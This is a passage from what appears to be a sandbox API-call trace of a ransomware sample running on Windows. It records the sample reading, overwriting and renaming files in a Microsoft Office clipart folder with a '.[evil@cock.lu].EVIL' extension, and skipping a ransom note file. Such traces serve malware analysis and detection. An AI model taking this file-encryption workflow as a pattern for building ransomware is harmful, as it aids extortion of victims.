lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe78, lpOverlapped=0x0) returned 1 [0147.225] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.225] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.225] _errno () returned 0x84b1160840 [0147.225] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.225] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe80, lpOverlapped=0x0) returned 1 [0147.225] CloseHandle (hObject=0x1a8) returned 1 [0147.225] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.225] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.225] __uncaught_exception () returned 0x84b1160800 [0147.225] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.226] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153095.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153095.wmf.[evil@cock.lu].evil")) returned 1 [0147.227] ??_V@YAXPEAX@Z () returned 0x1 [0147.230] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF", dwFileAttributes=0x200) returned 0 [0147.230] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.230] wcsstr (_Str="J0153265.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.230] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF") returned 69 [0147.230] wcscmp (_String1="J0153265.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.230] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153265.WMF") returned 0x0 [0147.230] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF") returned 0x45 [0147.230] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153265.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.232] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbc0, lpOverlapped=0x0) returned 1 [0147.290] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.290] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.290] _errno () returned 0x84b1160840 [0147.290] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.290] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbe0, lpOverlapped=0x0) returned 1 [0147.290] CloseHandle (hObject=0x1a8) returned 1 [0147.290] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.291] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.291] __uncaught_exception () returned 0x84b1160800 [0147.291] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.291] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153265.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153265.wmf.[evil@cock.lu].evil")) returned 1 [0147.292] ??_V@YAXPEAX@Z () returned 0x1 [0147.294] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF", dwFileAttributes=0x200) returned 0 [0147.295] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.295] wcsstr (_Str="J0153273.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.295] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF") returned 69 [0147.295] wcscmp (_String1="J0153273.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.295] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153273.WMF") returned 0x0 [0147.295] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF") returned 0x45 [0147.295] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153273.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.298] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4e80, lpOverlapped=0x0) returned 1 [0147.380] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.380] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.380] _errno () returned 0x84b1160840 [0147.380] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.380] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x4ea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4ea0, lpOverlapped=0x0) returned 1 [0147.380] CloseHandle (hObject=0x1a8) returned 1 [0147.380] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.381] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.381] __uncaught_exception () returned 0x84b1160800 [0147.381] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.381] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153273.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153273.wmf.[evil@cock.lu].evil")) returned 1 [0147.382] ??_V@YAXPEAX@Z () returned 0x1 [0147.385] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF", dwFileAttributes=0x200) returned 0 [0147.385] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.385] wcsstr (_Str="J0153299.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.385] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF") returned 69 [0147.385] wcscmp (_String1="J0153299.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.385] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153299.WMF") returned 0x0 [0147.385] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF") returned 0x45 [0147.385] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153299.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.387] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8f0c, lpOverlapped=0x0) returned 1 [0147.399] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.399] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.400] _errno () returned 0x84b1160840 [0147.400] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.400] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x8f20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8f20, lpOverlapped=0x0) returned 1 [0147.400] CloseHandle (hObject=0x1a8) returned 1 [0147.400] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.400] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.400] __uncaught_exception () returned 0x84b1160800 [0147.400] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.401] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153299.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153299.wmf.[evil@cock.lu].evil")) returned 1 [0147.401] ??_V@YAXPEAX@Z () returned 0x1 [0147.404] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF", dwFileAttributes=0x200) returned 0 [0147.405] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.405] wcsstr (_Str="J0153302.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.405] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF") returned 69 [0147.405] wcscmp (_String1="J0153302.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.405] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153302.WMF") returned 0x0 [0147.405] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF") returned 0x45 [0147.405] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153302.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.407] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7850, lpOverlapped=0x0) returned 1 [0147.415] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.415] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.415] _errno () returned 0x84b1160840 [0147.415] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.415] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x7860, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7860, lpOverlapped=0x0) returned 1 [0147.416] CloseHandle (hObject=0x1a8) returned 1 [0147.416] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.416] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.416] __uncaught_exception () returned 0x84b1160800 [0147.416] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.416] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153302.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153302.wmf.[evil@cock.lu].evil")) returned 1 [0147.417] ??_V@YAXPEAX@Z () returned 0x1 [0147.420] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF", dwFileAttributes=0x200) returned 0 [0147.420] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.420] wcsstr (_Str="J0153305.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.420] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF") returned 69 [0147.420] wcscmp (_String1="J0153305.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.420] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153305.WMF") returned 0x0 [0147.420] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF") returned 0x45 [0147.420] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153305.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.422] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9658, lpOverlapped=0x0) returned 1 [0147.425] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.425] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.425] _errno () returned 0x84b1160840 [0147.425] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.425] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x9660, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9660, lpOverlapped=0x0) returned 1 [0147.426] CloseHandle (hObject=0x1a8) returned 1 [0147.426] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.426] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.426] __uncaught_exception () returned 0x84b1160800 [0147.426] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.426] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153305.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153305.wmf.[evil@cock.lu].evil")) returned 1 [0147.427] ??_V@YAXPEAX@Z () returned 0x1 [0147.430] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF", dwFileAttributes=0x200) returned 0 [0147.430] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.430] wcsstr (_Str="J0153307.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.430] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF") returned 69 [0147.430] wcscmp (_String1="J0153307.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.430] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153307.WMF") returned 0x0 [0147.430] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF") returned 0x45 [0147.430] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153307.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.432] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3c58, lpOverlapped=0x0) returned 1 [0147.447] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.447] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.447] _errno () returned 0x84b1160840 [0147.447] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.447] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x3c60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3c60, lpOverlapped=0x0) returned 1 [0147.447] CloseHandle (hObject=0x1a8) returned 1 [0147.447] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.447] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.447] __uncaught_exception () returned 0x84b1160800 [0147.447] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.447] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153307.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153307.wmf.[evil@cock.lu].evil")) returned 1 [0147.448] ??_V@YAXPEAX@Z () returned 0x1 [0147.451] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF", dwFileAttributes=0x200) returned 0 [0147.451] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.451] wcsstr (_Str="J0153313.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.451] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF") returned 69 [0147.451] wcscmp (_String1="J0153313.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.451] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153313.WMF") returned 0x0 [0147.451] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF") returned 0x45 [0147.452] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153313.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.454] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4238, lpOverlapped=0x0) returned 1 [0147.456] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.456] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.456] _errno () returned 0x84b1160840 [0147.456] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.456] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x4240, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4240, lpOverlapped=0x0) returned 1 [0147.456] CloseHandle (hObject=0x1a8) returned 1 [0147.457] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.457] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.457] __uncaught_exception () returned 0x84b1160800 [0147.457] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.457] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153313.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153313.wmf.[evil@cock.lu].evil")) returned 1 [0147.458] ??_V@YAXPEAX@Z () returned 0x1 [0147.461] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF", dwFileAttributes=0x200) returned 0 [0147.461] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.461] wcsstr (_Str="J0153398.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.461] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF") returned 69 [0147.461] wcscmp (_String1="J0153398.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.461] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153398.WMF") returned 0x0 [0147.461] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF") returned 0x45 [0147.461] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153398.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.463] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4464, lpOverlapped=0x0) returned 1 [0147.471] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.471] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.471] _errno () returned 0x84b1160840 [0147.471] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.471] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x4480, 